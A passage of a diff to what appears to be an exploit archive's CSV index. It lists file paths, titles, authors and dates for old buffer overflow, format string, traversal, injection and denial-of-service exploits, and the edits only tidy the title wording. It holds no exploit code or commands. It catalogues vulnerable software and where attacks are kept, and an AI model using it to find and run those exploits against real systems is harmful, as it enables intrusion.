+19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 - xlock(1) (long 'Username') Buffer Overflow",1999-11-25,AK,sco,local,0 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0 19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal",1999-11-29,"Ussr Labs",multiple,remote,0 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,unix,remote,0 @@ -17098,7 +17099,7 @@ id,file,description,date,author,platform,type,port 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0 19733,platforms/windows/local/19733.txt,"McAfee 4.0 / Network Associates for Windows NT 4.0.2/4.0.3 a / Norton AntiVirus 2000 - Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 - Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",windows,remote,0 -19735,platforms/linux/local/19735.txt,"Debian Linux 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local,0 +19735,platforms/linux/local/19735.txt,"Debian 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local,0 19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name",2000-05-02,"rain forest puppy",windows,remote,0 19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0 19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 - JavaScript Email Access",2000-02-01,"Georgi Guninski",windows,remote,0 @@ -17144,14 +17145,14 @@ id,file,description,date,author,platform,type,port 19781,platforms/multiple/remote/19781.sh,"Alex Heiphetz Group eZshopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote,0 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos,0 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0 -19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD - Bypass Authentication",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 +19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD - Authentication Bypass",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0 19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 - Input Validation",2000-03-02,"Jonathan Leto",cgi,remote,0 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - Denial of Serviceemu Distribution Configuration",2000-03-02,suid,linux,local,0 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 -19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 Plugin - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 +19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 Plugin - Unrestricted Arbitrary File Upload",2012-07-13,"Chris Kellum",php,webapps,0 19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0 @@ -17164,7 +17165,7 @@ id,file,description,date,author,platform,type,port 19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Buffer Overflow",2000-03-10,bladi,linux,remote,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (1)",2000-03-11,Krahmer,linux,local,0 19803,platforms/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 -19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File manipulation",2000-03-11,"S. Krahmer",linux,local,0 +19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",linux,local,0 19805,platforms/windows/remote/19805.txt,"GameHouse dldisplay - ActiveX control 0 / Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote,0 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0 19807,platforms/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos,0 @@ -17190,7 +17191,7 @@ id,file,description,date,author,platform,type,port 19827,platforms/windows/dos/19827.txt,"NT 4.0 / Windows 2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0 19828,platforms/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 - Apache .htaccess Disclosure",2000-03-31,"Paul Schreiber",multiple,remote,0 -19829,platforms/php/webapps/19829.txt,"Joomla OS Property 2.0.2 - Unrestricted File Upload",2012-07-14,D4NB4R,php,webapps,0 +19829,platforms/php/webapps/19829.txt,"Joomla OS Property 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0 19831,platforms/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,102 19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,8080 19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,0 @@ -17278,7 +17279,7 @@ id,file,description,date,author,platform,type,port 19919,platforms/hardware/dos/19919.c,"Cisco 7xx Series Router - Denial of Service",1999-03-11,Tiz.Telesup,hardware,dos,0 19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow Denial of Service",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 -19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 +19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password",2000-05-17,"rain forest puppy",windows,remote,0 19923,platforms/hardware/dos/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 - Denial of Service",2000-05-17,cassius,hardware,dos,0 19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 @@ -17400,7 +17401,7 @@ id,file,description,date,author,platform,type,port 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 - Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service",2000-06-30,"Marc of eEye",windows,dos,0 20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",multiple,dos,0 -20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 +20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' DEP Bypass",2012-07-23,"Daniel Romero",windows,local,0 20054,platforms/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 - Password File (1)",2000-06-16,pbw,unix,local,0 @@ -17523,7 +17524,7 @@ id,file,description,date,author,platform,type,port 20185,platforms/linux/local/20185.c,"RedHat 6 - glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 - /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 - LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 -20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' locale Subsystem Format String Exploit",2000-09-08,warning3,solaris,local,0 +20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' locale Subsystem Format String",2000-09-08,warning3,solaris,local,0 20189,platforms/unix/local/20189.c,"Libc locale - Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 20190,platforms/unix/local/20190.c,"Libc locale - Exploit (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local,0 @@ -17598,7 +17599,7 @@ id,file,description,date,author,platform,type,port 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow ASLR Bypass",2012-08-05,pole,windows,local,0 -20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File manipulation",1995-03-02,"Larry Glaze",irix,local,0 +20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request",2000-10-03,"BindView's Razor Team",windows,local,0 20266,platforms/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0 20298,platforms/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0 @@ -17657,7 +17658,7 @@ id,file,description,date,author,platform,type,port 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20326,platforms/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local,0 -20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 - Username Validity Disclosure",1999-08-23,"Eilon Gishri",unix,remote,0 +20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 - 'Username' Validity Disclosure",1999-08-23,"Eilon Gishri",unix,remote,0 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab - /tmp File",2000-10-20,"Kyong-won Cho",hp-ux,local,0 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL - Arbitrary Command Execution",2000-10-26,blackangels,hardware,remote,0 @@ -17702,13 +17703,13 @@ id,file,description,date,author,platform,type,port 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0 -20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username and Password Retrieval",2000-10-26,@stake,hardware,remote,0 +20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote 'Username' and Password Retrieval",2000-10-26,@stake,hardware,remote,0 20373,platforms/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,hp-ux,dos,0 20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0 20376,platforms/unix/dos/20376.txt,"Wietse Venema Rpcbind Replacement 2.1 - Denial of Service",1998-11-13,"Patrick Gilbert",unix,dos,0 20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0 -20378,platforms/linux/local/20378.pl,"Debian GNU/Linux 3.1 - top Format String",2004-12-12,"Kevin Finisterre",linux,local,0 +20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0 20379,platforms/windows/dos/20379.txt,"Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 - Developer Remote Overflow",2000-04-04,"Bruce Potter",windows,dos,0 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0 @@ -17764,7 +17765,7 @@ id,file,description,date,author,platform,type,port 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - MetaCharacter",1999-11-09,"Cody T. - hhp",cgi,remote,0 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,cgi,remote,0 -20436,platforms/unix/local/20436.sh,"Apple Mac OS X 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0 +20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0 20437,platforms/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 20438,platforms/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 20439,platforms/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 @@ -17811,7 +17812,7 @@ id,file,description,date,author,platform,type,port 20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 -20485,platforms/osx/local/20485.sh,"Viscosity OpenVPN Client (OS X) - Privilege Escalation",2012-08-13,zx2c4,osx,local,0 +20485,platforms/osx/local/20485.sh,"Viscosity OpenVPN Client (OSX) - Privilege Escalation",2012-08-13,zx2c4,osx,local,0 20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery",1997-01-01,anonymous,unix,remote,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - File System Disclosure",2000-12-07,Dodger,windows,remote,0 @@ -17862,7 +17863,7 @@ id,file,description,date,author,platform,type,port 20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 - Backdoor Password",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 - Incorrect File Permissions",2001-01-11,"Tamer Sahin",php,webapps,0 -20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload",2012-08-15,ICheer_No0M,php,webapps,0 +20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Arbitrary File Upload",2012-08-15,ICheer_No0M,php,webapps,0 20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0 20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0 20705,platforms/multiple/dos/20705.py,"sap NetWeaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 @@ -17870,7 +17871,7 @@ id,file,description,date,author,platform,type,port 20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0 -20547,platforms/windows/remote/20547.txt,"Microsoft Internet Explorer - Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 +20547,platforms/windows/remote/20547.txt,"Microsoft Internet Explorer - Time Element Memory Corruption (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",php,webapps,0 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - Cross-Site Request Forgery",2012-08-16,DaOne,php,webapps,0 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) - Remote Execution",2012-08-16,iJoo,linux,remote,0 @@ -17878,7 +17879,7 @@ id,file,description,date,author,platform,type,port 20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet",2001-01-15,"Georgi Guninski",windows,remote,0 20554,platforms/linux/local/20554.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (1)",2001-01-13,IhaQueR,linux,local,0 20555,platforms/linux/local/20555.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)",2001-01-13,IhaQueR,linux,local,0 -20556,platforms/linux/local/20556.c,"Debian Linux 2.2 - splitvt Format String",2001-01-16,"Michel Kaempf",linux,local,0 +20556,platforms/linux/local/20556.c,"Debian 2.2 - splitvt Format String",2001-01-16,"Michel Kaempf",linux,local,0 20557,platforms/windows/remote/20557.pl,"Omnicron OmniHTTPd 2.0.7 - File Corruption / Command Execution",2001-08-01,"Joe Testa",windows,remote,0 20558,platforms/multiple/dos/20558.txt,"Apache 1.2 Web Server - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos,0 20559,platforms/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 - Heap Overflow",2001-01-17,CyRaX,windows,remote,0 @@ -17922,12 +17923,12 @@ id,file,description,date,author,platform,type,port 20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 - Networking Mutex Denial of Service",2001-01-24,"Arne Vidstrom",windows,dos,0 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0 20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQL Injection",2012-08-17,loneferret,php,webapps,0 -20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Root",1994-02-24,CIAC,unix,remote,0 +20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Root Exploit",1994-02-24,CIAC,unix,remote,0 20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,windows,remote,0 20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",multiple,remote,0 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 - nlps_server Buffer Overflow",1998-04-01,"Last Stage of Delirium",solaris,remote,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 - ximp40 Library Buffer Overflow",2001-01-31,UNYUN,solaris,local,0 -20604,platforms/linux/local/20604.sh,"Debian 2.2 / S.u.S.E 6.3/6.4/7.0 - man -l Format String",2001-01-31,IhaQueR,linux,local,0 +20604,platforms/linux/local/20604.sh,"Debian 2.2 / S.u.S.E 6.3/6.4/7.0 - man '-l' Format String",2001-01-31,IhaQueR,linux,local,0 20605,platforms/windows/remote/20605.cpp,"Apple QuickTime plugin - Windows 4.1.2 (Japanese) Remote Overflow",2012-08-18,UNYUN,windows,remote,0 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow",2000-03-26,"Jin Ho You",cgi,remote,0 20607,platforms/windows/remote/20607.txt,"goahead WebServer 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",windows,remote,0 @@ -18054,7 +18055,7 @@ id,file,description,date,author,platform,type,port 20742,platforms/sco/dos/20742.txt,"SCO Open Server 5.0.6 - recon Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20743,platforms/solaris/local/20743.c,"Solaris 2.x/7.0/8 - Xsun HOME Buffer Overflow",2001-04-10,"Riley Hassell",solaris,local,0 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote,0 -20745,platforms/solaris/remote/20745.txt,"Solaris 2.6/7.0 - IN.FTPD CWD Username Enumeration",2001-04-11,"Johnny Cyberpunk",solaris,remote,0 +20745,platforms/solaris/remote/20745.txt,"Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration",2001-04-11,"Johnny Cyberpunk",solaris,remote,0 20746,platforms/palm_os/local/20746.c,"Strip Password Generator 0.3/0.4/0.5 - Limited Password-Space",2001-04-10,"Thomas Roessler",palm_os,local,0 20747,platforms/linux/dos/20747.txt,"Oracle Application Server 4.0.8.2 - ndwfn4.so Buffer Overflow",2001-04-11,"Fyodor Yarochkin",linux,dos,0 20748,platforms/linux/remote/20748.pl,"cfingerd 1.4 - Format String (1)",2001-04-11,Lez,linux,remote,0 @@ -18209,7 +18210,7 @@ id,file,description,date,author,platform,type,port 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0 20905,platforms/unix/local/20905.txt,"Thibault Godouet FCron 1 - Symbolic Link",2001-06-07,"Uwe Ohse",unix,local,0 20906,platforms/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Buffer Overflow",2001-06-07,dex,unix,local,0 -20907,platforms/windows/dos/20907.sh,"Microsoft Windows 2000 - Telnet Username Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0 +20907,platforms/windows/dos/20907.sh,"Microsoft Windows 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0 20908,platforms/linux/remote/20908.c,"Xinetd 2.1.8 - Buffer Overflow",2001-06-28,qitest1,linux,remote,0 20909,platforms/multiple/remote/20909.txt,"IBM Tivoli NetView 5/6 - OVActionD SNMPNotify Command Execution",2001-06-08,"Milo van der Zee",multiple,remote,0 20910,platforms/windows/remote/20910.pl,"TransSoft Broker FTP Server 3.0/4.0/4.7/5.x - CWD Buffer Overflow",2001-06-10,byterage,windows,remote,0 @@ -18282,7 +18283,7 @@ id,file,description,date,author,platform,type,port 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",cgi,remote,0 20983,platforms/php/webapps/20983.pl,"Joomla Spider Calendar Lite (com_spidercalendar) - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 -20984,platforms/osx/remote/20984.txt,"Apple Mac OS X 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0 +20984,platforms/osx/remote/20984.txt,"Apple Mac OSX 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0 20985,platforms/php/local/20985.php,"PHP 4.x - SafeMode Arbitrary File Execution",2001-06-30,"Wojciech Purczynski",php,local,0 20986,platforms/linux/local/20986.c,"Xvt 2.1 - Buffer Overflow",2001-07-02,"Christophe Bailleux",linux,local,0 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0 @@ -18339,7 +18340,7 @@ id,file,description,date,author,platform,type,port 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 - Locate Arbitrary Command Execution",2001-08-01,"Josh Smith",linux,local,0 21044,platforms/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 - Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 -21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query manipulation",2001-08-03,kill-9,php,webapps,0 +21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 - NT4ALL Denial of Service",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - Denial of Service",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 @@ -18401,7 +18402,7 @@ id,file,description,date,author,platform,type,port 21108,platforms/unix/local/21108.txt,"SpeechD 0.1/0.2 - Privileged Command Execution",2001-09-11,"Tyler Spivey",unix,local,0 21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0 21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0 -21112,platforms/linux/remote/21112.php,"Red Hat Linux 7.0 Apache - Remote Username Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 +21112,platforms/linux/remote/21112.php,"Red Hat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0 21114,platforms/freebsd/local/21114.txt,"FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading",2001-09-17,"Przemyslaw Frasunek",freebsd,local,0 21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible 